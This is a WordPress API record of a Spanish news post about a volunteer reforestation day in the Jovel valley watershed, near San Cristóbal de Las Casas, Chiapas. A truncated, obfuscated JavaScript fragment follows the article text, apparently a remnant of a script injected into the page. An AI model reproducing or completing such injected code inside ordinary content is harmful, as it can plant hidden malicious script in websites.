{"id":16734,"date":"2024-07-16T01:52:37","date_gmt":"2024-07-16T01:52:37","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=16734"},"modified":"2024-07-16T01:52:38","modified_gmt":"2024-07-16T01:52:38","slug":"reforestan-cuenca-hidrografica-de-sclc-se-suman-mas-voluntarios","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=16734","title":{"rendered":"Reforestan Cuenca Hidrogr\u00e1fica de SCLC, se suman m\u00e1s voluntarios"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"720\" height=\"540\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/07\/IMG-20240715-WA0010.jpg\" alt=\"\" class=\"wp-image-16735\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/07\/IMG-20240715-WA0010.jpg 720w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/07\/IMG-20240715-WA0010-300x225.jpg 300w\" sizes=\"auto, (max-width: 720px) 100vw, 720px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/ Corresponsal<\/p>\n\n\n\n<p>15 de julio del 2024. San Crist\u00f3bal de Las Casas.- Nuevos voluntarios se unieron a la quinta jornada de reforestaci\u00f3n organizada por T\u00fa Bosque Asociaci\u00f3n Civil y el Comit\u00e9 de Cuenca del Valle de Jovel. Esta actividad ambiental se llev\u00f3 a cabo en el paraje Chilimjoveltic, municipio de San Juan Chamula, y cont\u00f3 con la participaci\u00f3n de ni\u00f1os, j\u00f3venes, adultos mayores y los propietarios de la parcela intervenida.<br>Alejandro Ruiz Guzm\u00e1n, coordinador de la campa\u00f1a, inform\u00f3 a trav\u00e9s de un comunicado que esta reforestaci\u00f3n forma parte de la Decimos\u00e9ptima Campa\u00f1a de Reforestaci\u00f3n. En esta jornada, aliados como Na Bolom, Pronatura Sur, El Caldero, Calamar, Panader\u00eda F\u00e1tima y Materiales de los Altos, colaboraron en la plantaci\u00f3n de casi un millar de \u00e1rboles de diferentes especies nativas.<br>La actividad no solo busca revitalizar la cuenca hidrogr\u00e1fica, sino tambi\u00e9n fomentar la participaci\u00f3n comunitaria y la conciencia ambiental. Los organizadores destacaron la importancia de involucrar a diversas generaciones en estos esfuerzos, promoviendo as\u00ed un sentido de responsabilidad compartida hacia el entorno natural.<br>Las pr\u00f3ximas jornadas de reforestaci\u00f3n est\u00e1n programadas para los d\u00edas s\u00e1bado 20 y domingo 21 de julio en la comunidad de Cruzton. T\u00fa Bosque Asociaci\u00f3n Civil y el Comit\u00e9 de Cuenca del Valle de Jovel celebraron el aumento constante en el n\u00famero de voluntarios, lo cual refleja un creciente inter\u00e9s y compromiso de la comunidad en la protecci\u00f3n y restauraci\u00f3n de sus recursos naturales.<br>\u201cLa participaci\u00f3n activa de la comunidad y los voluntarios es crucial para el \u00e9xito de estas campa\u00f1as, que no solo contribuyen a la mejora del medio ambiente, sino que tambi\u00e9n fortalecen el tejido social y promueven la sostenibilidad en la regi\u00f3n\u201d, concluy\u00f3.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/ Corresponsal 15 de julio del 2024. San Crist\u00f3bal de Las Casas.- Nuevos voluntarios se unieron a la quinta jornada de reforestaci\u00f3n organizada por T\u00fa Bosque Asociaci\u00f3n Civil y el Comit\u00e9 de Cuenca del Valle de Jovel. Esta actividad ambiental se llev\u00f3 a cabo en el paraje Chilimjoveltic, municipio de San Juan Chamula, y &hellip;<\/p>\n","protected":false},"author":2,"featured_media":16735,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-16734","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/16734","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=16734"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/16734\/revisions"}],"predecessor-version":[{"id":16736,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/16734\/revisions\/16736"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/16735"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=16734"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=16734"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=16734"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}